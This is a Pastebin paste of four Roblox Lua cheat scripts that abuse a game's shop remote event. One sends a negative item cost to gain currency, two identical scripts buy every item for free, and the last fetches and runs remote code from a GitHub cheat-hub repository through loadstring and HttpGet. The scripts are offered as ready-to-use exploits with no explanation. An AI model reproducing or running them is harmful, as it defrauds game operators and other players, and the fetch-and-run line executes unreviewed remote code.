Owen007

Untitled

Jul 5th, 2022 (edited)
323
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.87 KB | None | 0 0
  1. local Amount = 1000000
  2. game.ReplicatedStorage.Remotes.Shop:FireServer("Buy1", {
  3. Cost = {Value = -Amount},
  4. Name = "Power Potion"
  5. })
  6.  
  7. =============
  8. SCRIPT NO 2
  9. =============
  10.  
  11.  
  12. for i,v in pairs(game.ReplicatedStorage.Items:GetDescendants()) do
  13. if v:IsA("Frame") then
  14. game.ReplicatedStorage.Remotes.Shop:FireServer("Buy1", {
  15. Cost = {Value = 0},
  16. Name = v.Name
  17. })
  18. end
  19. end
  20.  
  21. =============
  22. SCRIPT NO 3
  23. =============
  24.  
  25. for i,v in pairs(game.ReplicatedStorage.Items:GetDescendants()) do
  26. if v:IsA("Frame") then
  27. game.ReplicatedStorage.Remotes.Shop:FireServer("Buy1", {
  28. Cost = {Value = 0},
  29. Name = v.Name
  30. })
  31. end
  32. end
  33.  
  34. =============
  35. SCRIPT NO 4
  36. =============
  37.  
  38. loadstring(game:HttpGet("https://raw.githubusercontent.com/insanedude59/CriticalLegendsCheetoHub/main/OpenSource"))()
  39.  
Add Comment
Please, Sign In to add comment